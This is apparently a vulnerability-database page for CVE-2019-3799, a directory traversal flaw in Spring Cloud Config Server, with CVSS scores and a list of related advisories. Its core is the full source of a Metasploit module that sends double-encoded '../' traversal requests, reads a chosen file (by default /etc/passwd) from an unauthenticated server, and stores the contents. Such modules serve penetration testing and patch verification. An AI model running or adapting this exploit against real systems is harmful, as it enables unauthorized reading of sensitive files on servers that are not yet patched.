Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDhiraj Mishra, Vern, metasploit.comPACKETSTORM:181104
HistorySep 01, 2024 - 12:00 a.m.

Spring Cloud Config Server Directory Traversal

2024-09-0100:00:00
Dhiraj Mishra, Vern, metasploit.com
packetstormsecurity.com
16
spring cloud config
directory traversal
unauthenticated
vulnerability
version 2.1
version 2.0
version 1.4

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

AI Score

7.4

Confidence

Low

JSON
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Spring Cloud Config Server Directory Traversal',  
'Description' => %q{  
This module exploits an unauthenticated directory traversal vulnerability  
which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,  
versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6. Spring  
Cloud Config listens by default on port 8888.  
},  
'References' =>  
[  
['CVE', '2019-3799'],  
['URL', 'https://pivotal.io/security/cve-2019-3799']  
],  
'Author' =>  
[  
'Vern', # Vulnerability discovery  
'Dhiraj Mishra' # Metasploit module  
],  
'DisclosureDate' => '2019-04-17',  
'License' => MSF_LICENSE  
))  
  
register_options(  
[  
Opt::RPORT(8888),  
OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']),  
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])  
])  
end  
  
def data  
Rex::Text.rand_text_alpha(3..8)  
end  
  
def run_host(ip)  
filename = datastore['FILEPATH']  
traversal = "#{"..%252F" * datastore['DEPTH']}#{filename}"  
uri = "/#{data}/#{data}/master/#{traversal}"  
  
res = send_request_raw({  
'method' => 'GET',  
'uri' => uri  
})  
  
unless res && res.code == 200  
print_error('Nothing was downloaded')  
return  
end  
  
vprint_good("#{peer} - #{res.body}")  
path = store_loot(  
'springcloud.traversal',  
'text/plain',  
ip,  
res.body,  
filename  
)  
print_good("File saved in: #{path}")  
end  
end  
`

Related

zdt 1
redhatcve 1
cvelist 1
exploitpack 1
metasploit 1
veracode 1
nuclei 1
cve 1
packetstorm 1
exploitdb 1
nvd 1
osv 2
myhack58 1
prion 1
github 1
openvas 1
oracle 1
zdt
zdt
Spring Cloud Config 2.1.x - Path Traversal Exploit
2019-05-01 00:00:00
redhatcve
redhatcve
CVE-2019-3799
2019-05-13 08:25:09
cvelist
cvelist
CVE-2019-3799 Directory Traversal with spring-cloud-config-server
2019-05-06 15:21:37
exploitpack
exploitpack
Spring Cloud Config 2.1.x - Path Traversal (Metasploit)
2019-04-30 00:00:00
metasploit
metasploit
Spring Cloud Config Server Directory Traversal
2019-04-18 07:24:34
veracode
veracode
Directory Traversal
2019-04-17 09:12:42
nuclei
nuclei
Spring Cloud Config Server - Local File Inclusion
2020-06-22 13:35:37
cve
cve
CVE-2019-3799
2019-05-06 16:29:01
packetstorm
packetstorm
Spring Cloud Config 2.1.x Path Traversal
2019-04-30 00:00:00
exploitdb
exploitdb
Spring Cloud Config 2.1.x - Path Traversal (Metasploit)
2019-04-30 00:00:00
nvd
nvd
CVE-2019-3799
2019-05-06 16:29:01
osv
osv
Path Traversal in Spring Cloud Config
2019-05-23 08:39:23
CVE-2019-3799
2019-05-06 16:29:01
myhack58
myhack58
Spring Cloud Config directory traversal vulnerability, CVE-2019-3799οΌ‰early warning-vulnerability warning-the black bar safety net
2019-04-19 00:00:00
prion
prion
Directory traversal
2019-05-06 16:29:00
github
github
Path Traversal in Spring Cloud Config
2019-05-23 08:39:23
openvas
openvas
Generic HTTP Directory Traversal (Web Dirs) - Active Check
2021-07-22 00:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - April 2022
2022-04-19 00:00:00

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

AI Score

7.4

Confidence

Low

JSON
Related for PACKETSTORM:181104
zdt1redhatcve1cvelist1exploitpack1metasploit1veracode1nuclei1cve1packetstorm1exploitdb1nvd1osv2myhack581prion1github1openvas1oracle1